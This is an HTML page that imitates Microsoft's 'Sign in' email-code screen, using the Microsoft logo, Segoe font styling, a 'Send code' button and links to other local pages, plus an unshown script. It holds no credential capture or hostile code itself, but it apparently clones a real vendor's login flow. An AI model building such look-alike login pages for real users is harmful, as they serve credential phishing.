<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Email Verification</title>
    <link rel="icon" href="./Images/favicon.svg" type="image/x-icon" />
    <link rel="stylesheet" href="MS.css" />
    <style>
        #message1{
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            font-weight: 400;
            font-style: normal;
            color: #1B1B1B;
            line-height: 1.6em;
            letter-spacing: 0em;

        }
        #message{
            display: block;
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            font-weight: 400;
            font-style: normal;
            color: #1B1B1B;
            line-height: 1.33em;
            letter-spacing: 0em;

        }
        #email{
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            font-weight: 400;
            font-style: normal;
            color: #1B1B1B;
            line-height: 1.33em;
            letter-spacing: 0em;

        }
        input[id='next']{
            text-decoration: underline;
            outline: 2px solid black;
        }
        /* #p{
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 24px;
            font-weight: 600;
            font-style: normal;
            color: #1B1B1B;
            line-height: 1.16em;
            letter-spacing: 0em;

        } */
    </style>
  </head>
  <body>
    <div id="sp">
      <img src="./Images/Microsoft_logo.svg" alt="Microsoft image logo" />
      <p id="message1"><span>Email</span></p>
      <h1 id="p">Sign in</h1>
      <p id="message">We'll email a code to  <span>Email</span> to sign you in.</p>
      
      <a href="./EmailPassword.html" id="access">Use your password instead</a>
      <div class="btn">
        <a href="./EmailVerificationLast.html"><input type="button" value="Send code" id="next"/></a>
      </div>
    </div>
    <div>
      <a href="">Terms of use</a>
      <a href="">Privacy & cookies</a>
      <span>...</span>
    </div>

    <script src="./emailVari1.js"></script>
  </body>
</html>